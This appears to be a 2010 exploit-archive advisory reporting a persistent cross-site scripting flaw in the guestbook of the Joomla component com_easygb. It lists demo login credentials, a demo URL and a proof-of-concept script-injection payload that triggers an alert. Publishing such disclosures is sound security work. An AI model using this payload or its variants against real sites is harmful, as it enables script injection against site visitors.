Joomla Component com_easygb Cross Site Scripting Vulnerability

2010-06-12 13:04:41

Author: L0rd CrusAd3r aka VSN [[email protected]]
Exploit Title:Joomla Persistent XSS Vulnerable
Published: 2010-06-08
Vendor url:http://www.joomla-addons.org/
Platform: Unix, Linux , Windows

Greetz to:Sid3^effects, aa_Numb, M4n0, D4rk Blu3, KD and to all ICW members

#############################################################################################################################################################################

DESCRIPTION:

Contains Persistent XSS on Joomla

###############################################################################################################################################################################

Vulnerability:

Username: demo
Password: demo

The Site contain Persistent XSS Vulnerable on Guest Book

demo URL:-

Parameter:'"--><script>alert(0x000872)</script>

http:http://demo.joomla-addons.org/index.php?option=com_easygb&Itemid=6[XSS]

################################################################################################################################################################################
--
With R3gards,
L0rd CrusAd3r

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.